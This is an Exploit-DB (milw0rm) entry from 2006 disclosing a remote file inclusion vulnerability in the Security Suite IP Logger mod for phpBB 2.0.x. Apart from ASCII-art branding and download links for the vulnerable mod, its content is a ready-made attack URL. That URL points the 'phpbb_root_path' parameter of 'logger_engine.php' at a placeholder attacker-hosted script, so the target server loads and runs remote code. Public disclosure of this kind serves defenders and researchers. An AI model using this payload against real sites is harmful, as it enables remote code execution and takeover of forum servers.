phpBB Security Suite Mod 1.0.0 - 'logger_engine.php' Remote File Inclusion

EDB-ID:

2480

Author:

SpiderZ

Type:

webapps

Platform:

PHP

Published:

2006-10-05

           /      \
        \  \  ,,  /  /
         '-.`\()/`.-'
        .--_'(  )'_--.
       / /` /`""`\ `\ \           * SpiderZ Hacking Security *
        |  |  ><  |  |
        \  \      /  /
            '.__.'


# Author: SpiderZ
# Security Suite IP Logger Remote File Inclusion Vulnerability
# For: phpBB ( 2.0.x - 2.0.21 )
# Site: www.spiderz.altervista.org
# Site02: www.spiderz.netsons.org
_________________________________________________________________________


# Remote File Inclusion - Security Suite IP Logger



http://site.com/[path]/includes/logger_engine.php?phpbb_root_path=http://[Evil_script]



-------------------------------------------------------------------------

# Download: http://www.phpbb.de/viewtopic.php?t=30261

# Download2: http://prdownload.berlios.de/dwingmods/logger_mod100.zip

-------------------------------------------------------------------------

# milw0rm.com [2006-10-05]